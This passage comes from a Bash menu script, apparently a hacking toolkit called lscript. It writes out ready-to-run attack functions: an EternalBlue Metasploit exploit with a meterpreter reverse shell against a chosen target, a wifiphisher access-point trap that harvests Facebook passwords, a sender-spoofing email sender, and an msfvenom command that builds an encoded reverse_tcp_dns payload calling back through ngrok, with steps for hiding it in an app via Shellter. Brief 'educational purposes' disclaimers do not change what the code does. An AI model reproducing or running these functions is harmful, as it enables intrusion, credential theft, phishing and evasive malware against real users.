3731 | if [ -d /root/lscriptold/lscript/ks ]
3732 | then
3733 | cp /root/lscriptold/lscript/ks "$LPATH"
3734 | fi
3735 | echo -e "Ok , everything seems to be fine by now."
3736 | sleep 1
3737 | echo -e "A new terminal will open, and then the new install.sh will run to update the lscript.I will close."
3738 | echo -e ""
3739 | sleep 4
3740 | echo -e "$PAKTC"
3741 | $READAK
3742 | cd "$LPATH"
3743 | gnome-terminal -e ./install.sh
3744 | clear
3745 | if [ -d /root/lscriptold/ks ]
3746 | then
3747 | echo -e "Copying old shortcuts"
3748 | cp /root/lscriptold/ks "$LPATH"
3749 | sleep 1
3750 | echo -e "Done."
3751 | sleep 1
3752 | clear
3753 | fi
3754 | sleep 1
3755 | echo -e ""
3756 | echo -e "Removing old lscript"
3757 | rm -rf /root/lscriptold
3758 | echo -e "Exiting..."
3759 | sleep 1
3760 | exit
3761 | else
3762 | clear
3763 | echo -e "You didnt select "y" so you go back..."
3764 | sleep 3
3765 | exec bash "$0"
3766 | fi
3767 | else
3768 | echo -e "There is no update available"
3769 | sleep 1
3770 | echo -e "Installed version: $VERSION"
3771 | sleep 1
3772 | echo -e "Github version: $VER"
3773 | sleep 1
3774 | echo -e "$PAKTGB"
3775 | $READAK
3776 | exec bash "$0"
3777 | fi
3778 | else
3779 | clear
3780 | echo -e "There is no connection."
3781 | sleep 1
3782 | echo -e "Maybe you should type 'stop' in the main manu to gain internet access again"
3783 | echo -e ""
3784 | echo -e "$PAKTGB"
3785 | $READAK
3786 | exec bash "$0"
3787 | fi
3788 | }
3789 | function hidden_shortcuts
3790 | {
3791 | clear
3792 | echo -e ""$YS" interface"$CE") Change your interface"
3793 | echo -e ""$YS" wififb"$CE") Create open wifi access point and get fb passwords with wifiphisher"
3794 | echo -e ""$YS"eternalblue"$CE") Launch msfconsole with eternalblue exploit on target"
3795 | echo -e ""$YS" etercheck"$CE") Check if a target is vulnerable to eternalblue exploit"
3796 | echo -e ""$YS" changelog"$CE") View the changelog of the lscript versions"
3797 | echo -e ""$YS" pstart"$CE") service postgresql start"
3798 | echo -e ""$YS" pstop"$CE") service postgresql stop"
3799 | echo -e ""$YS" nstart"$CE") service network-manager start"
3800 | echo -e ""$YS" nstop"$CE") service network-manager stop"
3801 | echo -e ""$YS" astart"$CE") service apache2 start"
3802 | echo -e ""$YS" astop"$CE") service apache2 stop"
3803 | echo -e "$PAKTGB"
3804 | $READAK
3805 | clear
3806 | }
3807 | function one_time_per_launch_ks
3808 | {
3809 | if [ -d ""$KSPATH"/nums" ]
3810 | then
3811 | rm -r "$KSPATH"/nums
3812 | fi
3813 | mkdir "$KSPATH"/nums
3814 | nn=1
3815 | ff=1
3816 | HOWMANY=0
3817 | HOWADD=$(( HOWMANYTOOLS + 1 ))
3818 | while [ "$nn" != "$HOWADD" ]
3819 | do
3820 | listshortcuts
3821 | if [ -f ""$KSPATH"/"$TITLE"/"$TITLE"ks.txt" ]
3822 | then
3823 | echo -e "$TITLE" > "$KSPATH"/nums/"$ff".txt
3824 | ff=$(( ff+1 ))
3825 | HOWMANY=$(( HOWMANY+1 ))
3826 | fi
3827 | nn=$(( nn+1 ))
3828 |
3829 | done
3830 | ONETIMEPERLAUNCH="1"
3831 | }
3832 | function interface_menu
3833 | {
3834 | WLANN=$(cat "$LPATH"/wlan.txt)
3835 | WLANNM=$(cat "$LPATH"/wlanmon.txt)
3836 | echo -e "Your current wireless interface names are $WLANN and $WLANNM"
3837 | sleep 2
3838 | echo -e "Do you want to change you interface names?"$YNYES": "
3839 | read INAG
3840 | if [ "$INAG" = "n" ]
3841 | then
3842 | clear
3843 | echo -e "Then why did you come here? lol"
3844 | sleep 3
3845 | exec bash "$0"
3846 | else
3847 | clear
3848 | rm "$LPATH"/wlan.txt
3849 | rm "$LPATH"/wlanmon.txt
3850 | set_interface_number
3851 | fi
3852 | }
3853 | function tools_menu
3854 | {
3855 | while true
3856 | do
3857 | echo -e "------------------------------"$RS"TOOLS"$CE"------------------------------"
3858 | printf '\033]2;TOOLS\a'
3859 | echo -e ""$YS" 1"$CE") Wifi tools"
3860 | echo -e ""$YS" 2"$CE") Remote access"
3861 | echo -e ""$YS" 3"$CE") Information gathering"
3862 | echo -e ""$YS" 4"$CE") Others"
3863 | echo -e ""$YS" 5"$CE") Install/reinstall a tool"
3864 | echo -e ""$YS"back"$CE") Go back"
3865 | echo -e ""$YS"00"$CE") Main menu"
3866 | echo -e ""$YS" 0"$CE") EXIT"
3867 | echo "Choose: "
3868 | read -e CATEG
3869 | clear
3870 | if [ "$CATEG" = "1" ]
3871 | then
3872 | wifi_tools
3873 | elif [ "$CATEG" = "2" ]
3874 | then
3875 | remote_access
3876 | elif [ "$CATEG" = "3" ]
3877 | then
3878 | information_gathering
3879 | elif [ "$CATEG" = "4" ]
3880 | then
3881 | other_tools
3882 | elif [ "$CATEG" = "5" ]
3883 | then
3884 | reinstall_tools
3885 | elif [ "$CATEG" = "0" ]
3886 | then
3887 | clear
3888 | exit
3889 | elif [ "$CATEG" = "back" ]
3890 | then
3891 | BACKL="1"
3892 | break
3893 | elif [ "$CATEG" = "00" ]
3894 | then
3895 | clear
3896 | exec bash "$0"
3897 | fi
3898 | done
3899 | }
3900 | function public_ip
3901 | {
3902 | clear
3903 | CHECKMON=$(ifconfig | grep "mon")
3904 | if [ "$CHECKMON" = "" ]
3905 | then
3906 | PUBLICIP=$(curl -s ipinfo.io/ip)
3907 | if [[ $PUBLICIP = "" ]]
3908 | then
3909 | PUBLICIP=$(curl -s checkip.dyndns.org | sed -e 's/.*Current IP Address: //' -e 's/<.*$//')
3910 | if [[ $PUBLICIP = "" ]]
3911 | then
3912 | PUBLICIP="Connection error."
3913 | fi
3914 | fi
3915 | echo "Your public IP is: "$PUBLICIP""
3916 | #~ curl -s checkip.dyndns.org | sed -e 's/.*Current IP Address: //' -e 's/<.*$//'
3917 | else
3918 | echo -e "When monitor mode is enabled, you don't have internet access."
3919 | echo -e "Select 'd2' to disable monitor mode"
3920 | echo -e "$PAKTGB"
3921 | $READAK
3922 | clear
3923 | exec bash "$0"
3924 | fi
3925 | }
3926 | function terms_of_use
3927 | {
3928 | printf '\033]2;TERMS OF USE\a'
3929 | clear
3930 | echo -e ""$RS"You need to accept the terms."$CE""
3931 | sleep 1
3932 | echo -e "$PAKTC"
3933 | $READAK
3934 | clear
3935 | echo -e "This tool is only for educational purposes only."
3936 | sleep 2
3937 | echo -e "Use this tool only on your own network and never without permission."
3938 | sleep 2
3939 | echo -e "I am not responsible for anything you do with this tool."
3940 | sleep 2
3941 | echo -e "Will you use this tool only on your own network and only with your own responsibility?("$YS"YES"$CE"/"$YS"NO"$CE"): "
3942 | read YESORNO
3943 | if [ "$YESORNO" = "YES" ]
3944 | then
3945 | echo "You have agreed the terms and you use this tool with your own responsibility." > "$LPATH"/IAGREE.txt
3946 | sleep 1
3947 | clear
3948 | else
3949 | echo -e "You didn't type 'YES' , so you cannot continue"
3950 | sleep 4
3951 | fi
3952 | exec bash "$0"
3953 | }
3954 | function eternalblue
3955 | {
3956 | if [ ! -d "$LPATH"/rce ]
3957 | then
3958 | mkdir "$LPATH"/rce
3959 | fi
3960 | echo -e "LHOST: "
3961 | read LHOSTL
3962 | echo -e "RHOST: "
3963 | read RHOSTL
3964 | echo -e "TARGETARCHITECTURE("$YS"x86"$CE"/"$YS"x64"$CE"): "
3965 | read TARGETARCHL
3966 | if [ "$TARGETARCHL" = "x64" ]
3967 | then
3968 | PROCESSINJECTL="lsass.exe"
3969 | PAYLOADL="windows/x64/meterpreter/reverse_tcp"
3970 | else
3971 | PAYLOADL="windows/meterpreter/reverse_tcp"
3972 | fi
3973 | echo -e "TARGET("$YS"0"$CE"-"$YS"8"$CE"): "
3974 | read TARGETL
3975 | echo "use exploit/windows/smb/eternalblue_doublepulsar" > "$LPATH"/rce/eternalbluerc.rc
3976 | echo "set LHOST "$LHOSTL"" >> "$LPATH"/rce/eternalbluerc.rc
3977 | echo "set RHOST "$RHOSTL"" >> "$LPATH"/rce/eternalbluerc.rc
3978 | echo "set PAYLOAD "$PAYLOADL"" >> "$LPATH"/rce/eternalbluerc.rc
3979 | echo "set TARGET "$TARGETL"" >> "$LPATH"/rce/eternalbluerc.rc
3980 | echo "set TARGETARCHITECTURE "$TARGETARCHL"" >> "$LPATH"/rce/eternalbluerc.rc
3981 | echo "set PROCESSINJECT "$PROCESSINJECTL"" >> "$LPATH"/rce/eternalbluerc.rc
3982 | echo "show info" >> "$LPATH"/rce/eternalbluerc.rc
3983 | echo "exploit -j" >> "$LPATH"/rce/eternalbluerc.rc
3984 | msfconsole -r "$LPATH"/rce/eternalbluerc.rc
3985 |
3986 | }
3987 | function eternalblue_check
3988 | {
3989 | if [ ! -d "$LPATH"/rce ]
3990 | then
3991 | mkdir "$LPATH"/rce
3992 | fi
3993 | echo -e "RHOST: "
3994 | read RHOSTL
3995 | echo "use auxiliary/scanner/smb/smb_ms17_010" > "$LPATH"/rce/eternalbluerc.rc
3996 | echo "set RHOSTS "$RHOSTL"" >> "$LPATH"/rce/eternalbluerc.rc
3997 | echo "exploit" >> "$LPATH"/rce/eternalbluerc.rc
3998 | msfconsole -r "$LPATH"/rce/eternalbluerc.rc
3999 |
4000 | }
4001 | function start_menu
4002 | {
4003 | enable_wlan
4004 | echo -e "Enabling $WLANNM..."
4005 | echo -e "Killing services..."
4006 | airmon-ng check kill | grep "nothing"
4007 | echo -e "Done."
4008 | echo -e "Starting monitor mode..."
4009 | airmon-ng start $WLANN | grep "monitor mode" | awk -F "(" {'print $2'} | cut -d ')' -f1
4010 | echo -e "Done."
4011 | echo -e "Changing mac address of $WLANNM to 00:11:22:33:44:55..."
4012 | ifconfig $WLANNM down
4013 | macchanger -m 00:11:22:33:44:55 $WLANNM | grep "New MAC:"
4014 | ifconfig $WLANNM up
4015 | echo -e "Done."
4016 | }
4017 | function stop_menu
4018 | {
4019 | stop_monitor
4020 | echo -e "Changing mac address of $WLANN to the original one..."
4021 | ifconfig $WLANN down
4022 | macchanger -p $WLANN | grep "Current MAC:"
4023 | ifconfig $WLANN up
4024 | echo -e "SUCCESS!"
4025 | }
4026 | function spoof_email
4027 | {
4028 | while true
4029 | do
4030 | sm=0
4031 | clear
4032 | if [ ! -d /bin/lscript/smtp ]
4033 | then
4034 | mkdir /bin/lscript/smtp
4035 | fi
4036 | echo -e ""$RS"YOU SHOULD FIRST SIGN UP ON https://www.smtp2go.com AND VERIFY YOUR EMAIL."$CE""
4037 | echo -e ""$RS"THEN GO TO https://app.smtp2go.com/settings/users AND MAKE A USERNAME AND PASS."$CE""
4038 | echo -e ""$RS" ########ALWAYS HAVE PERMISSION OF THE EMAILS YOU SPOOF########"$CE""
4039 | echo -e ""$RS" ########DONT SEND VIRUSES , PHISHING OR ILLEGAL THINGS########"$CE""
4040 | if [ ! -f /bin/lscript/smtp/smtpemail.txt ]
4041 | then
4042 | echo -e ""$YS" 1"$CE") Set your SMTP username and pass "$RS"NOT SET"$CE""
4043 | else
4044 | read smtpemail < /bin/lscript/smtp/smtpemail.txt
4045 | echo -e ""$YS" 1"$CE") Set your SMTP username and pass Current: "$YS""$smtpemail""$CE""
4046 | fi
4047 | echo -e ""$YS" 2"$CE") Send a spoofed email"
4048 | echo -e ""$YS" 3"$CE") Clear your SMTP username and pass from lscript"
4049 | echo -e ""$YS" 4"$CE") Fix email failed"
4050 | echo -e ""$YS"back"$CE") Go back"
4051 | echo -e ""$YS" 0"$CE") EXIT"
4052 | read SMTP
4053 | if [ "$SMTP" = "1" ]
4054 | then
4055 | clear
4056 | echo -e "Enter your smtp username(find it here: https://app.smtp2go.com/settings/users ): "
4057 | read SMTPEMAIL
4058 | echo -e "Enter your smtp password(find it here: https://app.smtp2go.com/settings/users ): "
4059 | read SMTPPASS
4060 | clear
4061 | echo "$SMTPEMAIL" > /bin/lscript/smtp/smtpemail.txt
4062 | echo "$SMTPPASS" > /bin/lscript/smtp/smtppass.txt
4063 | echo -e "Credentials saved on /bin/lscript/smtp"
4064 | sleep 3
4065 | elif [ "$SMTP" = "4" ]
4066 | then
4067 | clear
4068 | echo -e "If you email fails, the reason is because on option 1 you didnt set the correct username and password. Find those at https://app.smtp2go.com/settings/users."
4069 | sleep 2
4070 | echo -e "$PAKTGB"
4071 | read -e -n 1 -r
4072 | elif [ "$SMTP" = "3" ]
4073 | then
4074 | if [ -f /bin/lscript/smtp/smtpemail.txt ]
4075 | then
4076 | rm /bin/lscript/smtp/smtpemail.txt
4077 | echo -e "Username removed"
4078 | else
4079 | echo -e "Not username found"
4080 | fi
4081 | if [ -f /bin/lscript/smtp/smtppass.txt ]
4082 | then
4083 | rm /bin/lscript/smtp/smtppass.txt
4084 | echo -e "Password removed"
4085 | else
4086 | echo -e "Not password found"
4087 | fi
4088 | sleep 2
4089 | continue
4090 | elif [ "$SMTP" = "0" ]
4091 | then
4092 | clear
4093 | exit
4094 | elif [ "$SMTP" = "back" ]
4095 | then
4096 | clear
4097 | break
4098 | elif [ "$SMTP" = "2" ]
4099 | then
4100 | while true
4101 | do
4102 | clear
4103 | if [ ! -f /bin/lscript/smtp/smtpemail.txt ]
4104 | then
4105 | echo -e "No smtp username found."
4106 | sm=1
4107 | fi
4108 | if [ ! -f /bin/lscript/smtp/smtppass.txt ]
4109 | then
4110 | echo -e "No smtp pass found."
4111 | sm=1
4112 | fi
4113 | if [ "$sm" = 1 ]
4114 | then
4115 | break
4116 | fi
4117 | read smtppass < /bin/lscript/smtp/smtppass.txt
4118 | read smtpemail < /bin/lscript/smtp/smtpemail.txt
4119 | clear
4120 | echo -e "Your username is "$RS""$smtpemail""$CE""
4121 | echo -e ""
4122 | echo -e "Enter the target's email: "
4123 | read TARGETSEMAIL
4124 | echo -e "Enter the email that you want the target to see: "
4125 | read SPOOFEDEMAIL
4126 | echo -e "Enter the subject of the message: "
4127 | read SUBJECTEMAIL
4128 | echo -e "Enter the message: "
4129 | read MESSAGEEMAIL
4130 | echo -e "Enter the smtp server ("$YS"Enter"$CE"=mail.smtp2go.com): "
4131 | read SMTPSERVER
4132 | if [ "$SMTPSERVER" = "" ]
4133 | then
4134 | SMTPSERVER="mail.smtp2go.com"
4135 | fi
4136 | echo -e "Enter the smtp port ("$YS"Enter"$CE"=2525): "
4137 | read SMTPPORT
4138 | if [ "$SMTPPORT" = "" ]
4139 | then
4140 | SMTPPORT="2525"
4141 | fi
4142 | echo -e "Press "$YS"enter"$CE" to send the message to "$TARGETSEMAIL""
4143 | read
4144 | clear
4145 | sendemail -f $SPOOFEDEMAIL -t $TARGETSEMAIL -u $SUBJECTEMAIL -m $MESSAGEEMAIL -s "$SMTPSERVER":"$SMTPPORT" -xu "$smtpemail" -xp "$smtppass"
4146 | echo -e "$PAKTGB"
4147 | read -e -n 1 -r
4148 | break
4149 | done
4150 | fi
4151 | done
4152 | }
4153 | function new_terminal
4154 | {
4155 | while true
4156 | do
4157 | clear
4158 | CHECKMON=$(ifconfig | grep "mon")
4159 | if [ "$CHECKMON" = "" ]
4160 | then
4161 | echo -e "Monitor mode is not enabled."
4162 | echo -e ""
4163 | echo -e "Do you want to enable monitor mode? "$YNYES": "
4164 | read MONITOREN
4165 | clear
4166 | if [ "$MONITOREN" = "n" ]
4167 | then
4168 | #~ echo -e "Select 'start' or '2' to enable it"
4169 | echo -e "$PAKTGB"
4170 | $READAK
4171 | clear
4172 | exec bash "$0"
4173 | else
4174 | start_menu
4175 | continue
4176 | fi
4177 | else
4178 | if [ "$YORNAA" = "10" ]
4179 | then
4180 | echo -e "Moving into new terminal..."
4181 | sleep 1
4182 | FJC=0
4183 | export FJC
4184 | gnome-terminal --geometry 87x35+9999+0 -e lh1
4185 | sleep 1
4186 | exec bash "$0"
4187 | break
4188 | elif [ "$YORNAA" = "11" ]
4189 | then
4190 | clear
4191 | echo -e "Moving into new terminal..."
4192 | sleep 1
4193 | gnome-terminal --geometry 80x25+9999+0 -e lh3
4194 | sleep 1
4195 | exec bash "$0"
4196 | break
4197 | elif [ "$YORNAA" = "12" ]
4198 | then
4199 | echo -e "Moving into new terminal..."
4200 | sleep 1
4201 | gnome-terminal --geometry 80x25+9999+0 -e lh4
4202 | sleep 1
4203 | exec bash "$0"
4204 | break
4205 | fi
4206 | fi
4207 | done
4208 | }
4209 | function check_if_ks
4210 | {
4211 | while [ $var1 -le $HOWMANY ]
4212 | do
4213 | read TITLE < "$KSPATH"/nums/"$var1".txt
4214 | read YORNAKS < "$KSPATH"/"$TITLE"/"$TITLE"ks.txt
4215 | if [ "$YORNAA" = "$YORNAKS" ]
4216 | then
4217 | read COMMAND1 < ""$KSPATH"/"$TITLE"/"$TITLE".txt"
4218 | read COMMAND2 < ""$KSPATH"/"$TITLE"/"$TITLE"2.txt"
4219 | $COMMAND1
4220 | #~ if [ -f ""$KSPATH"/"$TITLE"/"$TITLE"3.txt" ]
4221 | #~ then
4222 | #~ read $COMMAND3 < ""$KSPATH"/"$TITLE"/"$TITLE"3.txt"
4223 | #~ $COMMAND3
4224 | #~ fi
4225 | $COMMAND2
4226 | BACKL="1"
4227 | fi
4228 | var1=$(( var1+1 ))
4229 | done
4230 | }
4231 | function wififb
4232 | {
4233 | echo -e "Enter the name of the access point you want to create: "
4234 | read -e ESSIDAP
4235 | export ESSIDAP
4236 | xterm -geometry 90x60+9999+999999 -e bash -c 'printf "\033]2;WIFI FB TRAP\a" && wifiphisher --nojamming --essid "$ESSIDAP" -p oauth-login; exec bash' & disown
4237 | }
4238 | function donate_option
4239 | {
4240 | while true
4241 | do
4242 | clear
4243 | printf '\033]2;Donation\a'
4244 | echo -e "If you found my script useful, you can buy me a coffee :)"
4245 | echo -e "Total lscript donations: $DONATIONS"
4246 | echo -e ""$YS" 1"$CE") Open browser to donate"
4247 | echo -e ""$YS" 2"$CE") Copy donation link"
4248 | echo -e ""$YS"back"$CE") I don't care about your work! :P"
4249 | echo -e "Choose: "
4250 | read DON
4251 | if [ $DON = "1" ]
4252 | then
4253 | xdg-open "https://www.paypal.com/cgi-bin/webscr?cmd=_s-xclick&hosted_button_id=GC9RSY4CS6KAY"
4254 | elif [ $DON = "2" ]
4255 | then
4256 | echo -e "Donation link: https://www.paypal.com/cgi-bin/webscr?cmd=_s-xclick&hosted_button_id=GC9RSY4CS6KAY"
4257 | echo -e "$PAKTGB"
4258 | $READAK
4259 | elif [ $DON = "back" ]
4260 | then
4261 | break
4262 | fi
4263 | done
4264 | }
4265 | function main_options
4266 | {
4267 | if [ "$YORNAA" = "0" ]
4268 | then
4269 | exit
4270 | elif [ "$YORNAA" = "16" ]
4271 | then
4272 | while true
4273 | do
4274 | clear
4275 | if [ -f /root/ngrok ]
4276 | then
4277 | printf '\033]2;NGROK PORT FORWARD\a'
4278 | echo -e ""$YS"help"$CE") How to make it work?"
4279 | echo -e ""$YS" 1"$CE") Open a tcp port"
4280 | echo -e ""$YS" 2"$CE") Open a tls port"
4281 | echo -e ""$YS" 3"$CE") Open a http port"
4282 | echo -e ""$YS" 4"$CE") Intergrate with Shellter"
4283 | echo -e ""$YS" 5"$CE") Set your ngrok authtoken"
4284 | echo -e ""$YS"back"$CE") Go back"
4285 | echo -e "Choose: "
4286 | read NG
4287 | clear
4288 | if [[ "$NG" = "help" || "$NG" = "h" ]]
4289 | then
4290 | echo -e "With ngrok, you can port forward without router intergration."
4291 | echo -e "It is free, HOWEVER:"
4292 | echo -e "---to open a tcp port, you need to sign up (it's too easy)"
4293 | echo -e " Go to https://ngrok.com and choose "$YS"sign up"$CE"."
4294 | echo -e " When that's done, copy the given "$YS"authtoken"$CE"."
4295 | echo -e " (If you can't find it go to: https://dashboard.ngrok.com/auth )"
4296 | echo -e " Then select the 'set your authtoken' option in lscript, and paste it."
4297 | echo -e "---to make a reverse tcp payload:"
4298 | echo -e " You need to set the payload to: windows/meterpreter/reverse_tcp_dns"
4299 | echo -e "$PAKTGB"
4300 | $READAK
4301 | elif [[ $NG = 1 || $NG = 2 || $NG = 3 ]]
4302 | then
4303 | echo -e "Type the local port to forward: "
4304 | read PORTL
4305 | if [[ $NG = 1 ]]
4306 | then
4307 | PROT="tcp"
4308 | elif [[ $NG = 2 ]]
4309 | then
4310 | PROT="tls"
4311 | else
4312 | PROT="http"
4313 | fi
4314 | export PORTL
4315 | export PROT
4316 | xterm -geometry 85x15+9999+999999 -e bash -c './ngrok $PROT $PORTL; exec bash' & disown
4317 | elif [[ $NG = 4 ]]
4318 | then
4319 | while true
4320 | do
4321 | clear
4322 | echo -e ""$YS" 1"$CE") Make a raw tcp payload for Shellter"
4323 | echo -e ""$YS" 2"$CE") How to intergrate it"
4324 | echo -e ""$YS"back"$CE") Go back"
4325 | echo -e "Choose:"
4326 | read SHINT
4327 | clear
4328 | if [[ $SHINT = 1 ]]
4329 | then
4330 | while true
4331 | do
4332 | if [[ $NGPORT = "" ]]
4333 | then
4334 | NGPORT="\e[1;31mNONE\e[0m"
4335 | fi
4336 | clear
4337 | echo -e ""$YS" 1"$CE") Set the Ngrok tcp port CURRENT:"$NGPORT""
4338 | #~ echo -e ""$YS" 2"$CE") Set your local tcp port CURRENT:"$LPORT""
4339 | echo -e ""$YS"back"$CE") Go back"
4340 | echo -e ""$YS" run"$CE") Make the payload"
4341 | echo -e "Choose: "
4342 | read RP
4343 | if [[ $RP = 1 ]]
4344 | then
4345 | echo -e "Ngrok port: "
4346 | read NGPORT
4347 | elif [[ $RP = "back" ]]
4348 | then
4349 | break
4350 | elif [[ $RP = "run" ]]
4351 | then
4352 | RAW=rawfud
4353 | NUMB=1
4354 | while true
4355 | do
4356 | RAWN=""$RAW""$NUMB""
4357 | if [ -f /root/Desktop/"$RAWN".raw ]
4358 | then
4359 | NUMB=$((NUMB+1))
4360 | else
4361 | break
4362 | fi
4363 | done
4364 | msfvenom -p windows/meterpreter/reverse_tcp_dns LHOST=0.tcp.ngrok.io LPORT=$NGPORT -e x86/shikata_ga_nai -i 15 -f raw -o /root/Desktop/"$RAWN".raw
4365 | sleep 2
4366 | if [ -f /root/Desktop/"$RAWN".raw ]
4367 | then
4368 | clear
4369 | echo -e "Payload was saved to /root/Desktop/"$RAWN".raw"
4370 | fi
4371 | echo -e "$PAKTGB"
4372 | $READAK
4373 | fi
4374 | done
4375 | elif [[ $SHINT = 2 ]]
4376 | then
4377 | echo -e "First you should make a raw payload with option 1."
4378 | echo -e "Then open shellter and select your app to be injected."
4379 | echo -e "Then, on stealth mode select y."
4380 | echo -e "Select to type a custom payload, NOT listed."
4381 | echo -e "Then type the path of the payload you have created on option 1."
4382 | echo -e "For the listener, the payload is windows/meterpreter/reverse_tcp_dns"
4383 | echo -e "LHOST is 127.0.0.1 and LPORT is the port you opened to ngrok."
4384 | echo -e "$PAKTGB"
4385 | $READAK
4386 | elif [[ $SHINT = "back" ]]
4387 | then
4388 | break
4389 | fi
4390 | done
4391 | elif [[ $NG = "back" ]]
4392 | then
4393 | clear
4394 | break
4395 | elif [[ $NG = 5 ]]
4396 | then
4397 | echo -e "Type your authtoken: "
4398 | read AUTHT
4399 | if [ $AUTHT != "" ]
4400 | then
4401 | ./ngrok authtoken $AUTHT
4402 | echo -e "$PAKTGB"
4403 | $READAK
4404 | fi
4405 | fi
4406 | else
4407 | echo -e ""$RS"Ngrok is not installed.To install it, go to TOOLS -> Install/reinstall a tool -> ngrok"$CE""
4408 | echo -e "$PAKTGB"
4409 | $READAK
4410 | fi
4411 | done
4412 | elif [ "$YORNAA" = "donate" ]
4413 | then
4414 | donate_option
4415 | elif [ "$YORNAA" = "pstart" ]
4416 | then
4417 | service postgresql start
4418 | elif [ "$YORNAA" = "pstop" ]
4419 | then
4420 | service postgresql stop
4421 | elif [ "$YORNAA" = "nstart" ]
4422 | then
4423 | service network-manager start
4424 | elif [ "$YORNAA" = "nstop" ]
4425 | then
4426 | service network-manager stop
4427 | elif [ "$YORNAA" = "astart" ]
4428 | then
4429 | service apache2 start
4430 | elif [ "$YORNAA" = "astop" ]
4431 | then
4432 | service apache2 stop
4433 | elif [ "$YORNAA" = "15" ]
4434 | then
4435 | BACKL="1"
4436 | spoof_email
4437 | elif [ "$YORNAA" = "ks" ]
4438 | then
4439 | keyboard_shortcuts
4440 | elif [ "$YORNAA" = "interface" ]
4441 | then
4442 | interface_menu
4443 | elif [ "$YORNAA" = "9" ]
4444 | then
4445 | tools_menu
4446 | elif [ "$YORNAA" = "l" ]
4447 | then
4448 | clear
4449 | exec bash "$0"
4450 | elif [ "$YORNAA" = "clear" ]
4451 | then
4452 | echo -e "Ok.I can clear for you..."
4453 | sleep 1
4454 | clear
4455 | exec bash "$0"
4456 | elif [ "$YORNAA" = "gg" ]
4457 | then
4458 | geany /bin/lscript/l
4459 | elif [ "$YORNAA" = "1" ]
4460 | then
4461 | enable_wlan
4462 | elif [ "$YORNAA" = "d1" ]
4463 | then
4464 | check_wlans
4465 | if [[ $WLANCHECKING = "" ]]
4466 | then
4467 | echo -e ""$RS"Error. Could find $WLANN interface to disable."$CE""
4468 | else
4469 | disable_wlan
4470 | fi
4471 | elif [ "$YORNAA" = "2" ]
4472 | then
4473 | check_wlans
4474 | if [[ $WLANCHECKING = "" ]]
4475 | then
4476 | echo -e ""$RS"Error. Could find $WLANN interface."$CE""
4477 | else
4478 | echo -e "Enabling $WLANNM..."
4479 | echo -e "Killing services..."
4480 | (airmon-ng check kill &> /dev/null && echo -e "Done." ) || echo -e ""$RS"Error killing services"$YS""
4481 | echo -e "Starting monitor mode..."
4482 | (airmon-ng start $WLANN &>/dev/null && echo -e "Done" ) || echo -e "Error starting monitor mode."
4483 | fi
4484 | elif [ "$YORNAA" = "d2" ]
4485 | then
4486 | check_wlans
4487 | if [[ $WLANMCHECKING = "" ]]
4488 | then
4489 | echo -e ""$RS"Error. Could find $WLANNM interface."$CE""
4490 | else
4491 | stop_monitor
4492 | fi
4493 | #~ echo -e "$WLANN is probably up.Bring it down?"$YNNO": "
4494 | #~ read -e YORN
4495 | #~ if [ "$YORN" = "y" ]
4496 | #~ then
4497 | #~ #rfkill unblock wifi
4498 | #~ #rfkill unblock all
4499 | #~ ifconfig $WLANN down
4500 | #~ echo -e "$WLANN is now down."
4501 | #~ fi
4502 | elif [ "$YORNAA" = "3" ]
4503 | then
4504 | change_mac
4505 | elif [ "$YORNAA" = "d3" ]
4506 | then
4507 | interface_selection
4508 | clear
4509 | echo -e "Changing mac address of $MYINT to the original one..."
4510 | ifconfig $MYINT down
4511 | macchanger -p $MYINT
4512 | ifconfig $MYINT up
4513 | echo -e "Done."
4514 | elif [ "$YORNAA" = "4" ]
4515 | then
4516 | if [ ! -f "/etc/init.d/anonym8.sh" ]
4517 | then
4518 | echo -e "Anonym8 is not installed. Go to TOOLS -> Install/reinstall a tool to install it."
4519 | else
4520 | echo -e "Enabling anonym8..."
4521 | anonym8 start
4522 | echo -e "Done."
4523 | fi
4524 | elif [ "$YORNAA" = "d4" ]
4525 | then
4526 | if [ ! -f "/etc/init.d/anonym8.sh" ]
4527 | then
4528 | echo -e "Anonym8 is not installed. Go to TOOLS -> Install/reinstall a tool to install it."
4529 | else
4530 | echo -e "Disabling anonym8..."
4531 | anonym8 stop
4532 | echo -e "Done."
4533 | fi
4534 | elif [ "$YORNAA" = "5" ]
4535 | then
4536 | if [ ! -f "/usr/bin/anonsurf" ]
4537 | then
4538 | echo -e "Anonsurf is not installed. Go to TOOLS -> Install/reinstall a tool to install it."
4539 | else
4540 | echo -e "Enabling anonsurf..."
4541 | anonsurf start
4542 | echo -e "Done."
4543 | fi
4544 | elif [ "$YORNAA" = "d5" ]
4545 | then
4546 | if [ ! -f "/usr/bin/anonsurf" ]
4547 | then
4548 | echo -e "Anonsurf is not installed. Go to TOOLS -> Install/reinstall a tool to install it."
4549 | else
4550 | echo -e "Disabling anonsurf..."
4551 | anonsurf stop
4552 | echo -e "Done."
4553 | fi
4554 | elif [ "$YORNAA" = "6" ]
4555 | then
4556 | if [ ! -f "/usr/bin/anonsurf" ]
4557 | then
4558 | echo -e "Anonsurf is not installed. Go to TOOLS -> Install/reinstall a tool to install it."
4559 | else
4560 | echo -e "Status of anonsurf..."
4561 | anonsurf status
4562 | echo -e "Done."
4563 | fi
4564 | elif [ "$YORNAA" = "d6" ]
4565 | then
4566 | if [ ! -f "/usr/bin/anonsurf" ]
4567 | then
4568 | echo -e "Anonsurf is not installed. Go to TOOLS -> Install/reinstall a tool to install it."
4569 | else
4570 | echo -e "Restarting anonsurf..."
4571 | anonsurf change
4572 | echo -e "Done."
4573 | fi
4574 | elif [ "$YORNAA" = "r6" ]
4575 | then
4576 | if [ ! -f "/usr/bin/anonsurf" ]
4577 | then
4578 | echo -e "Anonsurf is not installed. Go to TOOLS -> Install/reinstall a tool to install it."
4579 | else
4580 | echo -e "Restarting anonsurf..."
4581 | anonym8 change
4582 | echo -e "Done."
4583 | fi
4584 | elif [ "$YORNAA" = "7" ]
4585 | then
4586 | public_ip
4587 | elif [ "$YORNAA" = "8" ]
4588 | then
4589 | interface_selection
4590 | clear
4591 | echo "Your MACs: "
4592 | macchanger -s $MYINT
4593 | elif [ "$YORNAA" = "10" ] || [ "$YORNAA" = "11" ] || [ "$YORNAA" = "12" ]
4594 | then
4595 | new_terminal
4596 | elif [ "$YORNAA" = "13" ]
4597 | then
4598 | mitm_menu
4599 | elif [ "$YORNAA" = "14" ]
4600 | then
4601 | metasploit_menu
4602 | elif [ "$YORNAA" = "exit" ]
4603 | then
4604 | kill -9 $PPID
4605 | exit
4606 | elif [ "$YORNAA" = "update" ]
4607 | then
4608 | printf '\033]2;UPDATE\a'
4609 | clear
4610 | update_lscript
4611 | elif [ "$YORNAA" = "if" ]
4612 | then
4613 | ifconfig
